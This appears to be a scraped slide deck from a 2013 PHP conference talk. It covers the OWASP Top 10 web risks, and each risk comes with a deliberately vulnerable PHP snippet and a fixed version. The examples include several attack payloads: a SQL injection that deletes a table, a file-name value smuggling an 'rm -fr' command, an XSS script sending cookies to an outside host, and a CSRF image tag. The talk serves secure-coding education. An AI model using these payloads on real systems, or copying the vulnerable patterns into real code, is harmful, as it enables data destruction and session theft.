Presented at #PHPLX 11 September 2013
The 2013 edition of OWASP (Open Web Application Security Project) top 10 has just been released and unfortunately Injections (not only SQL injection) is still the most common security problem. In this talk we will review the top 10 list of security problems looking at possible attack scenarios and ways to protect against them mostly from a PHP programmer perspective.
The Ultimate Guide to Choosing WordPress Pros and Cons
OWASP TOP 10 PHP Security Risks
1. Follow this topic:
@rjsmelo, #owasp, #php, #appsec
OWASP TOP 10 for PHP
programmers
RICARDO MELO
Presented at #PHPLX – 11 September 2013
2. @rjsmelo 2
RICARDO MELO
● CTO @ DRI
● PHP, Mysql, Linux and lots of other
OSS
● ZCE, RHCE, LPI 3, ITIL, etc
● +10 years building (and breaking)
things
3. @rjsmelo 3
About
● 14 Year old academic spin-off
● Pragmatic OSS Orientation
● PHP, Mysql, SugarCRM, Drupal,
JavaScript, Linux, etc.
● Crafters, Integrators
● Always looking for software developers
– Yes, right now!
4. 1999 - 2013 DRI. Some Rights Reserved
.
4
Outline
● OWASP
● OWASP TOP 10
● What's Next
● Conclusions
5. 1999 - 2013 DRI. Some Rights Reserved
.
5
What is OWASP?
● Open Web Application Security Project
● World wide non-for-profit
● Focus on security improvement and
awareness
● Very active community
● Lots of projects (you can start yours)
6. 1999 - 2013 DRI. Some Rights Reserved
.
6
What is OWASP TOP 10
● The name is “The Top 10 Most Critical
Web Application Risks”
● The focus is awareness
● Released 2003, 2004, 2007, 2010 and
2013
https://www.owasp.org/index.php/Top_10_2013
7. 1999 - 2013 DRI. Some Rights Reserved
.
7
Risk ?
Thread Agent Attack Vectors Weakness
Prevalence
Weakness
Detectability
Technical
Impacts
Business
Impacts
Application
Specific
EASY WIDESPREAD EASY SEVERE Application /
Business
Specific
AVERAGE COMMON AVERAGE MODERATE
DIFFICULT UNCOMMON DIFFICULT MINOR
8. 1999 - 2013 DRI. Some Rights Reserved
.
8
OWASP TOP 10 - 2013
● A1 – Injection
● A2 – Broken Authentication and Session
Management
● A3 – Cross-site Scripting (XSS)
● A4 – Insecure Direct Object References
● A5 – Security Misconfiguration
● A6 – Sensitive Data Exposure
● A7 – Missing Function Level Access Control
● A8 – Cross Site Request Forgery (CSRF)
● A9 – Using Components with Known Vulnerabilities
● A10 – Unvalidated Redirects and Forwards
9. 1999 - 2013 DRI. Some Rights Reserved
.
9
A1 - Injection
● Occurs when untrusted data is sent
directly to the interpreter!
● Not only SQL: NoSQL, Ldap, OS, XML,
Xpath!
● Never, NEVER trust ANY input!
10. 1999 - 2013 DRI. Some Rights Reserved
.
10
A1 – Injection Examples - SQL
<?php
// prune to sql injection
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb',
'username',
'password');
$stmt = $db->query(
"SELECT * FROM some_table limit "
. $_REQUEST['start_record']
. ",10");
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
// what if I set record = "1; delete from some_table; -- "
<?php
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb',
'username',
'password');
$stmt = $db->prepare("SELECT * FROM some_table limit ?,10");
$stmt->execute(array($_REQUEST['start_record']));
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
11. 1999 - 2013 DRI. Some Rights Reserved
.
11
A1 - Injection Samples - OS
<?php
// script.php?file=xpto.pdf
$fileType = exec( "file " . $_REQUEST['file']);
echo $fileType;
// but one can try with "xpto.pdf; rm -fr /some/folder"
<?php
// script.php?file=xpto.pdf
$fileType = exec( "file " . escapeshellarg($_REQUEST['file']));
echo $fileType;
12. 1999 - 2013 DRI. Some Rights Reserved
.
12
A2 – Broken Authentication and Session Management
● Broken implementations allowing
attacker to assume “other” user's
identity!
● Can be session hijack/fixation
● Broken authentication
● Or other fails that lead to compromise
passwords / keys / session tokens
14. 1999 - 2013 DRI. Some Rights Reserved
.
14
A3 – Cross-Site Scripting (XSS)
● Whenever untrusted data is sent to the
browser without proper validation and
escaping!
● XSS allows the attacker to OWN the
victims browser and do ... everything!
● Stored, Reflected and DOM based
XSS
15. 1999 - 2013 DRI. Some Rights Reserved
.
15
A3 – steal user cookie
<?php
// page prune to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= $_REQUEST['search']; ?>
<?= render_results($results); ?>
</body>
</html>
// set search to:
"<script>document.location='http://www.example.com/precious_cookie
?cookie='+document.cookie</script>"
<?php
// page prune to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?=
htmlentities($_REQUEST['search'],ENT_COMPAT|ENT_HTML401,'UTF-8'); ?>
<?= render_results($results); ?>
</body>
</html>
16. 1999 - 2013 DRI. Some Rights Reserved
.
16
A4 – Insecure Direct Object Reference
● Whenever developer exposes
references to internal objects and don't
have proper access control.
● Attackers can change the references
and access resources that shouldn't be
accessible.
17. 1999 - 2013 DRI. Some Rights Reserved
.
17
A4 – Access other user account
<?php
// prune to insecure direct reference
// script.php?account=10
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
echo render_account_info($account);
// and if I change account to "9" ?
<?php
// script.php?account=10
$user = new User($_SESSION['userInfo']);
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
if ( $account->canRead($user)) {
echo render_account_info($account);
} else {
echo "Access denied";
}
18. 1999 - 2013 DRI. Some Rights Reserved
.
18
A5 – Security Misconfiguration
● Often fails in securing the full stack
leads to application / servers being
compromised.
● Take into consideration other services /
applications running in the same
infrastructure
● Watch out for outdated software
● Watch out for default accounts
19. 1999 - 2013 DRI. Some Rights Reserved
.
19
A6 – Sensitive Data Exposure
● Whenever sensitive data isn't properly
protected allowing attackers to steal or
modify that information.
● Credit Card fraud, Identity theft, etc!
● Be aware, data should be protected
both in transit or on the storage engine
(don't forget the backups)
20. 1999 - 2013 DRI. Some Rights Reserved
.
20
A7 – Missing Function Level Access Control
● Most applications validate function
based access control before displaying
options in UI, but fail to validate when
the function is accessed.
● Attacker can forge request to functions
that shouldn't be available
21. 1999 - 2013 DRI. Some Rights Reserved
.
21
A7 – insecure function
<?php
// prune to insecure function access
// script.php?user=john&action=read
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$user = new User($userId);
switch($action) {
case 'read':
echo render_user($user);
break;
case 'delete':
$user->delete();
echo "user Deleted";
break;
}
// and if I change action to "delete"?
<?php
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$loggedUser = new AppUser($_SESSION['userInfo']);
$user = new User($userId);
switch($action) {
case 'read':
if ( $user->canRead($loggedUser) ){
echo render_user($user);
}
break;
case 'delete':
if ( $user->canDelete($loggedUser) ){
$user->delete();
echo "user Deleted";
}
break;
}
22. 1999 - 2013 DRI. Some Rights Reserved
.
22
A8 – Cross Site Request Forgery (CSRF)
● CSRF forces a victim's browser to send
a forged HTTP request to a vulnerable
web application (normally taking
advantage of an existing user session)
● No difference from user generated
requests!
23. 1999 - 2013 DRI. Some Rights Reserved
.
23
A8 – delete user
<?php
// vulnerable app
// delete.php?id=123
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
if ( $user->canDelete($loggedUser) ){
$user->delete();
}
?>
// attackers site:
<img src="http://www.example.com/users/delete.php?id=123" />
<?php
// vulnerable app
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
if (validate_token($_REQUEST['token'])) {
if ( $user->canDelete($loggedUser) ){
$user->delete();
}
}
24. 1999 - 2013 DRI. Some Rights Reserved
.
24
A9 – Using Components with know Vulnerabilities
● Whenever you use libraries,
frameworks, or other software modules
with known vulnerabilities.
● Attackers can leverage this issues to
attack your application / server / etc.
25. 1999 - 2013 DRI. Some Rights Reserved
.
25
A10 – Unvalidated Redirects and Forwards
● Web application often redirects users
to other pages, using untrusted data to
determine the destination pages.
● Atackers can redirect victims to
phishing or malware pages or use
forwards to access unauthorized
pages.
26. 1999 - 2013 DRI. Some Rights Reserved
.
26
A10 – “simple” Forward
<?php
class someController extends baseController {
public function preFunction($args,$action)
{
$this->checkAccess($args, $action);
}
public function indexAction($args)
{
// [...] do something here
if ( $args['callback'] && method_exists($this,$args['callback'])){
unset($args['callback']);
call_user_func_array(array($this,$args['callback']),$args);
}
return $response;
}
public function destroyAction($args)
{
$this->selfTerminate();
}
}
if ( $args['callback'] && method_exists($this,$args['callback'])){
$this->preFunction($args,$args['callback']);
unset($args['callback']);
call_user_func_array(array($this,$args['callback']),$args);
}
27. 1999 - 2013 DRI. Some Rights Reserved
.
27
What's Next For PHP Programmers
● OWASP
– http://goo.gl/lVRRY
● Cheat Sheets
– http://goo.gl/lVRRY
● OWASP Zed Attack Proxy
– http://goo.gl/QE5v1H
● OWASP Books – free
– http://goo.gl/aLx1q2
28. 1999 - 2013 DRI. Some Rights Reserved
.
28
Conclusions
● Keep the application secure is a
continuous process
● Avoiding the TOP 10 Risks don't make
your application secure, but is already
a HUGE step forward.
● Don't trust ANY input! Escape every
output!